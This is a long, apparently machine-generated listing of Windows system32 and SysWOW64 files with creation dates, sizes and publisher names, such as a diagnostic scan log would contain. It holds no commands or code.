2020-08-17 21:33 - 2020-08-17 21:33 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\udhisapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\fdProxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc6.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscui.cpl
2020-08-17 21:33 - 2020-08-17 21:33 - 000067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Printers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066832 _____ (Microsoft Corporation) C:\Windows\system32\iumcrypt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\keyiso.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EditBufferTestHook.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clfsw32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066560 _____ (Microsoft Corporation) C:\Windows\system32\findnetprinters.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066360 _____ (Microsoft Corporation) C:\Windows\system32\cryptdll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Graphics.Display.DisplayColorManagement.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvvmtransport.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasacct.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\enterpriseresourcemanager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ComputerDefaults.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AtBroker.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\iemigplugin.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\ssdpapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\rtutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SystemUWPLauncher.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\coloradapterclient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ApiSetHost.AppExecutionAlias.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\printui.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\ConfigureExpandedStorage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iemigplugin.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\srumapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000063288 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthHost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000062976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmgaproxystub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\printui.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Print.Workflow.Source.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\edpnotify.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000061240 _____ (Microsoft Corporation) C:\Windows\system32\hvhostsvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\mf3216.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\AxInstUI.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\devrtl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\reg.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000059221 _____ C:\Windows\system32\srms.dat
2020-08-17 21:33 - 2020-08-17 21:33 - 000058880 _____ C:\Windows\system32\runexehelper.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\offreg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000058880 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ModernAppCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000058696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\udhisapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MiracastReceiverExt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000058368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc6.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\SrTasks.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasads.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devrtl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000056832 _____ (Microsoft Corporation) C:\Windows\system32\pnppolicy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000056008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptdll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000055808 _____ (Microsoft Corporation) C:\Windows\system32\UevAppMonitor.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000055376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtmmvrortc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000055296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\efsext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000054272 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.CabUtil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000053760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtutils.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\BdeUISrv.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\findnetprinters.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000052152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ResourcePolicyClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnrollCtrl.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ffbroker.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudNotifications.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ByteCodeGenerator.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000049152 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edpnotify.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000048640 _____ (Microsoft Corporation) C:\Windows\system32\dusmapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ConfigureExpandedStorage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nsiproxy.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\ddrawex.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000047616 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AssignedAccessRuntime.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.EventLogMessages.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\Websocket.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf3216.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\RdpSa.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000045056 _____ (Microsoft Corporation) C:\Windows\system32\npmproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\werdiagcontroller.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserLanguageProfileCallback.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\XInput1_4.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000043536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\LaunchWinApp.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000042336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000042296 _____ (Microsoft Corporation) C:\Windows\system32\SysResetErr.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000041864 _____ (Microsoft Corporation) C:\Windows\system32\SecurityCenterBrokerPS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ddrawex.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\compact.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\UevAgentPolicyGenerator.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\upnpcont.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afunix.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iaspolcy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RdpSa.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000039936 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000039304 _____ (Microsoft Corporation) C:\Windows\system32\NtlmShared.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000038912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werdiagcontroller.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000038400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcicda.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XInputUap.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\acwow64.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\dusmtask.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000037688 _____ (Microsoft Corporation) C:\Windows\system32\SyncAppvPublishingServer.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atlthunk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\UIMgrBroker.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Websocket.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XInput1_4.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\enrollmentapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000036152 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\bdeui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\winnsi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mskssrv.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WordBreakers.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\posetup.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000033080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hwpolicy.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000033048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NtlmShared.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000032256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000032256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000032256 _____ (Microsoft Corporation) C:\Windows\system32\msisip.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000032056 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000030720 _____ C:\Windows\system32\uwfservicingapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\nsisvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sxstrace.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Drivers\afunix.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\RdpSaProxy.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\nlmproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndistapi.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000028368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SecurityCenterBrokerPS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000028344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winnsi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000027648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mciwave.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\fvecerts.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\PrintWorkflowProxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RdpSaProxy.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msisip.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ws2ifsl.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 000024792 _____ (Microsoft Corporation) C:\Windows\system32\nsi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000024064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mciseq.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\npmproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ias.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Management.WmiAccess.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000023040 _____ (Microsoft Corporation) C:\Windows\system32\msauserext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000022032 _____ (Microsoft Corporation) C:\Windows\system32\ScriptRunner.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Management.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000021520 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SystemEventsBrokerClient.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fvecerts.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ModernAppData.WinRT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000020944 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000020352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nsi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winnlsres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\winnlsres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019768 _____ (Microsoft Corporation) C:\Windows\system32\ResetEngine.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000019456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\wmsgapi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000019456 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.SyncCommon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msauserext.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dsregtask.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Common.WinRT.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\localui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlmproxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.LocalSyncProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\icsunattend.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\nlmsprep.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000016896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintWorkflowProxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.Workflow.Native.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000016696 _____ (Microsoft Corporation) C:\Windows\system32\spwizres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\MUILanguageCleanup.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.ps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\AcXtrnal.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlmsprep.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ModernSync.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\LangCleanupSysprepAction.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\d3d8thk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDJPN.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\UIManagerBrokerps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\UevTemplateBaselineGenerator.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\appvetwstreamingux.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDKOR.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d8thk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\TSErrRedir.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\RemoteFXvGPUDisablement.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\pacjsworker.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\UevTemplateConfigItemGenerator.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\iprtprio.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000011576 _____ (Microsoft Corporation) C:\Windows\system32\uxlibres.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.SmbSyncProvider.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\plasrv.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\DMAlertListener.ProxyStub.dll
